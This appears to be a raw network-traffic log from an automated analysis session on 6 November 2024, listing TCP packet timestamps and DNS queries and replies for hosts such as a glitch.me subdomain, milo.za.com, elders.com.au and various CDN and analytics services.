                                                                                                                                                                                                            Nov 6, 2024 06:29:50.629585028 CET44357758162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.629590988 CET57752443192.168.2.4104.17.245.203
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.629604101 CET44357752104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.629606009 CET57752443192.168.2.4104.17.245.203
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.629612923 CET44357752104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.629647017 CET44357758162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.629653931 CET57752443192.168.2.4104.17.245.203
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.629658937 CET57758443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.629677057 CET44357758162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.629689932 CET57752443192.168.2.4104.17.245.203
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.629690886 CET57758443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.629694939 CET44357758162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.629739046 CET44357758162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.629739046 CET57758443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.629748106 CET44357758162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.629770041 CET44357758162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.629782915 CET57758443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.629798889 CET57758443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.629806042 CET44357758162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.629817009 CET44357758162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.629829884 CET57758443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.629853010 CET44357758162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.629858971 CET57758443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.629868984 CET44357758162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.629900932 CET57758443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.629909039 CET44357758162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.629951954 CET57758443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.629959106 CET44357758162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.629981995 CET44357758162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.630024910 CET44357758162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.630028963 CET57758443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.630037069 CET44357758162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.630072117 CET57758443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.630108118 CET44357758162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.630141020 CET44357758162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.630151987 CET57758443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.630157948 CET44357758162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.630187035 CET57758443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.630197048 CET44357758162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.630203962 CET57758443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.630208969 CET44357758162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.630233049 CET44357758162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.630235910 CET57758443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.630264997 CET44357758162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.630268097 CET57758443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.630275011 CET44357758162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.630309105 CET57758443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.630431890 CET44357764104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.630541086 CET44357764104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.630574942 CET44357764104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.630583048 CET57764443192.168.2.4104.17.245.203
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.630592108 CET44357764104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.630623102 CET44357764104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.630630016 CET57764443192.168.2.4104.17.245.203
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.630635023 CET44357764104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.630656004 CET44357753162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.630664110 CET44357764104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.630666971 CET57764443192.168.2.4104.17.245.203
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.630675077 CET44357764104.17.245.203192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.630707026 CET57753443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.630714893 CET44357753162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.630727053 CET57764443192.168.2.4104.17.245.203
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.630757093 CET44357753162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.630762100 CET57753443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.630768061 CET44357753162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.630799055 CET57753443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.630805969 CET44357753162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.630851030 CET57753443192.168.2.4162.159.140.34
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.630851030 CET44357753162.159.140.34192.168.2.4
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.630861044 CET44357753162.159.140.34192.168.2.4
                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                            Nov 6, 2024 06:28:42.938551903 CET192.168.2.41.1.1.10x1b5bStandard query (0)astonishing-maize-sunstone.glitch.meA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:28:42.938843966 CET192.168.2.41.1.1.10x7e49Standard query (0)astonishing-maize-sunstone.glitch.me65IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:28:44.775362968 CET192.168.2.41.1.1.10xccc6Standard query (0)kit.fontawesome.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:28:44.776962996 CET192.168.2.41.1.1.10x2393Standard query (0)kit.fontawesome.com65IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:28:44.785846949 CET192.168.2.41.1.1.10xa917Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:28:44.786367893 CET192.168.2.41.1.1.10x434Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:28:48.724752903 CET192.168.2.41.1.1.10x2b15Standard query (0)upload.wikimedia.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:28:48.725061893 CET192.168.2.41.1.1.10x8789Standard query (0)upload.wikimedia.org65IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:28:50.004736900 CET192.168.2.41.1.1.10x2305Standard query (0)upload.wikimedia.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:28:50.004892111 CET192.168.2.41.1.1.10x106bStandard query (0)upload.wikimedia.org65IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:28:50.012545109 CET192.168.2.41.1.1.10xdf9fStandard query (0)logo.clearbit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:28:50.012728930 CET192.168.2.41.1.1.10x80e9Standard query (0)logo.clearbit.com65IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:28:51.364012957 CET192.168.2.41.1.1.10x7030Standard query (0)logo.clearbit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:28:51.364012957 CET192.168.2.41.1.1.10x2bccStandard query (0)logo.clearbit.com65IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:04.766037941 CET192.168.2.41.1.1.10x5333Standard query (0)milo.za.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:04.766213894 CET192.168.2.41.1.1.10x6922Standard query (0)milo.za.com65IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:06.215181112 CET192.168.2.41.1.1.10xe6b3Standard query (0)milo.za.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:06.215310097 CET192.168.2.41.1.1.10x543eStandard query (0)milo.za.com65IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.476665974 CET192.168.2.41.1.1.10xa8b2Standard query (0)elders.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.476890087 CET192.168.2.41.1.1.10xad8cStandard query (0)elders.com.au65IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.824959040 CET192.168.2.41.1.1.10xc042Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.825578928 CET192.168.2.41.1.1.10x9778Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.827739954 CET192.168.2.41.1.1.10x426bStandard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.828466892 CET192.168.2.41.1.1.10x2da5Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.017081976 CET192.168.2.41.1.1.10x37aeStandard query (0)elders.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.017559052 CET192.168.2.41.1.1.10x3495Standard query (0)elders.com.au65IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.179223061 CET192.168.2.41.1.1.10x37d5Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:44.179711103 CET192.168.2.41.1.1.10x6d0bStandard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.098967075 CET192.168.2.41.1.1.10xc49eStandard query (0)unpkg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:46.099571943 CET192.168.2.41.1.1.10x4aaStandard query (0)unpkg.com65IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.386090040 CET192.168.2.41.1.1.10x879cStandard query (0)cdn.jsdelivr.net65IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.386090040 CET192.168.2.41.1.1.10x3fd4Standard query (0)cdn.jsdelivr.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.394563913 CET192.168.2.41.1.1.10x477aStandard query (0)assets.adobedtm.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.394740105 CET192.168.2.41.1.1.10xe4aStandard query (0)assets.adobedtm.com65IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.756531000 CET192.168.2.41.1.1.10xf66cStandard query (0)unpkg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:49.756704092 CET192.168.2.41.1.1.10x3aa5Standard query (0)unpkg.com65IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.168795109 CET192.168.2.41.1.1.10xb643Standard query (0)connect.facebook.net65IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.168795109 CET192.168.2.41.1.1.10x4f4aStandard query (0)connect.facebook.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.404067039 CET192.168.2.41.1.1.10x6701Standard query (0)cdn.jsdelivr.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:50.404273033 CET192.168.2.41.1.1.10xdd6dStandard query (0)cdn.jsdelivr.net65IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:51.419651031 CET192.168.2.41.1.1.10x7dcdStandard query (0)www.clarity.msA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:51.419995070 CET192.168.2.41.1.1.10xd58aStandard query (0)www.clarity.ms65IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:51.420608044 CET192.168.2.41.1.1.10x17bdStandard query (0)assets.adobedtm.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:51.420608044 CET192.168.2.41.1.1.10xd697Standard query (0)assets.adobedtm.com65IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:51.432768106 CET192.168.2.41.1.1.10x22c4Standard query (0)dpm.demdex.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:51.432768106 CET192.168.2.41.1.1.10xd514Standard query (0)dpm.demdex.net65IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:52.597580910 CET192.168.2.41.1.1.10x710bStandard query (0)eldersrural.demdex.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:52.598068953 CET192.168.2.41.1.1.10x1489Standard query (0)eldersrural.demdex.net65IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:52.796176910 CET192.168.2.41.1.1.10xf8beStandard query (0)cdn.mouseflow.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:52.796821117 CET192.168.2.41.1.1.10x7962Standard query (0)cdn.mouseflow.com65IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:53.453576088 CET192.168.2.41.1.1.10x75f9Standard query (0)www.clarity.msA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:53.454655886 CET192.168.2.41.1.1.10xf869Standard query (0)www.clarity.ms65IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:53.455369949 CET192.168.2.41.1.1.10x6495Standard query (0)dpm.demdex.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:53.455744982 CET192.168.2.41.1.1.10x8feeStandard query (0)dpm.demdex.net65IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:53.530603886 CET192.168.2.41.1.1.10x7f29Standard query (0)connect.facebook.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:53.531146049 CET192.168.2.41.1.1.10x33aaStandard query (0)connect.facebook.net65IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:53.821475029 CET192.168.2.41.1.1.10x70e1Standard query (0)cm.everesttech.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:53.821847916 CET192.168.2.41.1.1.10xbad9Standard query (0)cm.everesttech.net65IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:53.935694933 CET192.168.2.41.1.1.10x3c27Standard query (0)cdn.mouseflow.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:53.936230898 CET192.168.2.41.1.1.10xa008Standard query (0)cdn.mouseflow.com65IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:54.077219963 CET192.168.2.41.1.1.10x2b91Standard query (0)f.clarity.ms65IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:54.077219963 CET192.168.2.41.1.1.10xd01eStandard query (0)f.clarity.msA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:54.170090914 CET192.168.2.41.1.1.10x5a74Standard query (0)eldersrural.sc.omtrdc.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:54.171547890 CET192.168.2.41.1.1.10xc9c8Standard query (0)eldersrural.sc.omtrdc.net65IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:55.118705034 CET192.168.2.41.1.1.10x7a29Standard query (0)f.clarity.msA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:55.120011091 CET192.168.2.41.1.1.10x3d61Standard query (0)f.clarity.ms65IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:55.192260027 CET192.168.2.41.1.1.10xbd18Standard query (0)eldersrural.sc.omtrdc.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:55.192524910 CET192.168.2.41.1.1.10x6040Standard query (0)eldersrural.sc.omtrdc.net65IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:56.707935095 CET192.168.2.41.1.1.10x6134Standard query (0)www.facebook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:56.708584070 CET192.168.2.41.1.1.10x6b20Standard query (0)www.facebook.com65IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:56.918584108 CET192.168.2.41.1.1.10x71f4Standard query (0)eldersrural.sc.omtrdc.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:56.918914080 CET192.168.2.41.1.1.10x4582Standard query (0)eldersrural.sc.omtrdc.net65IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:57.257296085 CET192.168.2.41.1.1.10x7ab1Standard query (0)apimprd.ext.elders.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:57.257426977 CET192.168.2.41.1.1.10xd546Standard query (0)apimprd.ext.elders.com.au65IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:57.330355883 CET192.168.2.41.1.1.10xf100Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:57.330692053 CET192.168.2.41.1.1.10x9c80Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:57.373534918 CET192.168.2.41.1.1.10xf4bbStandard query (0)yourir.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:57.373696089 CET192.168.2.41.1.1.10xe3fcStandard query (0)yourir.info65IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:58.731794119 CET192.168.2.41.1.1.10xdcd1Standard query (0)www.facebook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:58.732573986 CET192.168.2.41.1.1.10x41e4Standard query (0)www.facebook.com65IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:59.423739910 CET192.168.2.41.1.1.10xe281Standard query (0)yourir.infoA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:59.423947096 CET192.168.2.41.1.1.10x395cStandard query (0)yourir.info65IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:30:01.740979910 CET192.168.2.41.1.1.10x8f2Standard query (0)apimprd.ext.elders.com.auA (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:30:01.741416931 CET192.168.2.41.1.1.10xaf5cStandard query (0)apimprd.ext.elders.com.au65IN (0x0001)false
                                                                                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                            Nov 6, 2024 06:28:42.956415892 CET1.1.1.1192.168.2.40x1b5bNo error (0)astonishing-maize-sunstone.glitch.me54.91.146.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:28:42.956415892 CET1.1.1.1192.168.2.40x1b5bNo error (0)astonishing-maize-sunstone.glitch.me34.237.25.55A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:28:44.781913996 CET1.1.1.1192.168.2.40xccc6No error (0)kit.fontawesome.comkit.fontawesome.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:28:44.783684969 CET1.1.1.1192.168.2.40x2393No error (0)kit.fontawesome.comkit.fontawesome.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:28:44.792654991 CET1.1.1.1192.168.2.40xa917No error (0)www.google.com142.250.186.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:28:44.792917967 CET1.1.1.1192.168.2.40x434No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:28:48.731923103 CET1.1.1.1192.168.2.40x2b15No error (0)upload.wikimedia.org185.15.59.240A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:28:50.011451960 CET1.1.1.1192.168.2.40x2305No error (0)upload.wikimedia.org185.15.59.240A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:28:50.019540071 CET1.1.1.1192.168.2.40xdf9fNo error (0)logo.clearbit.comd26p066pn2w0s0.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:28:50.019540071 CET1.1.1.1192.168.2.40xdf9fNo error (0)d26p066pn2w0s0.cloudfront.net13.32.27.129A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:28:50.019540071 CET1.1.1.1192.168.2.40xdf9fNo error (0)d26p066pn2w0s0.cloudfront.net13.32.27.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:28:50.019540071 CET1.1.1.1192.168.2.40xdf9fNo error (0)d26p066pn2w0s0.cloudfront.net13.32.27.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:28:50.019540071 CET1.1.1.1192.168.2.40xdf9fNo error (0)d26p066pn2w0s0.cloudfront.net13.32.27.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:28:50.261581898 CET1.1.1.1192.168.2.40x80e9No error (0)logo.clearbit.comd26p066pn2w0s0.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:28:51.370975971 CET1.1.1.1192.168.2.40x2bccNo error (0)logo.clearbit.comd26p066pn2w0s0.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:28:51.371191978 CET1.1.1.1192.168.2.40x7030No error (0)logo.clearbit.comd26p066pn2w0s0.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:28:51.371191978 CET1.1.1.1192.168.2.40x7030No error (0)d26p066pn2w0s0.cloudfront.net13.32.27.129A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:28:51.371191978 CET1.1.1.1192.168.2.40x7030No error (0)d26p066pn2w0s0.cloudfront.net13.32.27.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:28:51.371191978 CET1.1.1.1192.168.2.40x7030No error (0)d26p066pn2w0s0.cloudfront.net13.32.27.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:28:51.371191978 CET1.1.1.1192.168.2.40x7030No error (0)d26p066pn2w0s0.cloudfront.net13.32.27.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:28:58.165817022 CET1.1.1.1192.168.2.40x795No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:28:58.165817022 CET1.1.1.1192.168.2.40x795No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:04.808337927 CET1.1.1.1192.168.2.40x5333No error (0)milo.za.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:04.808337927 CET1.1.1.1192.168.2.40x5333No error (0)milo.za.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:04.850406885 CET1.1.1.1192.168.2.40x6922No error (0)milo.za.com65IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:06.222280025 CET1.1.1.1192.168.2.40xe6b3No error (0)milo.za.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:06.222280025 CET1.1.1.1192.168.2.40xe6b3No error (0)milo.za.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:06.253822088 CET1.1.1.1192.168.2.40x543eNo error (0)milo.za.com65IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:11.857312918 CET1.1.1.1192.168.2.40x3c38No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:11.857312918 CET1.1.1.1192.168.2.40x3c38No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:34.045231104 CET1.1.1.1192.168.2.40x27feNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:34.045231104 CET1.1.1.1192.168.2.40x27feNo error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:37.747796059 CET1.1.1.1192.168.2.40x612cNo error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:37.747796059 CET1.1.1.1192.168.2.40x612cNo error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.493880987 CET1.1.1.1192.168.2.40xa8b2No error (0)elders.com.au162.159.140.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.493880987 CET1.1.1.1192.168.2.40xa8b2No error (0)elders.com.au172.66.0.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:41.630311966 CET1.1.1.1192.168.2.40xad8cNo error (0)elders.com.au65IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.831645966 CET1.1.1.1192.168.2.40xc042No error (0)www.google.com172.217.16.196A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.832613945 CET1.1.1.1192.168.2.40x9778No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.835439920 CET1.1.1.1192.168.2.40x426bNo error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.835439920 CET1.1.1.1192.168.2.40x426bNo error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:42.835479975 CET1.1.1.1192.168.2.40x2da5No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.033102036 CET1.1.1.1192.168.2.40x37aeNo error (0)elders.com.au172.66.0.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.033102036 CET1.1.1.1192.168.2.40x37aeNo error (0)elders.com.au162.159.140.34A (IP address)IN (0x0001)false
                                                                                                                                                                                                            Nov 6, 2024 06:29:43.318989038 CET1.1.1.1192.168.2.40x3495No error (0)elders.com.au65IN (0x0001)false
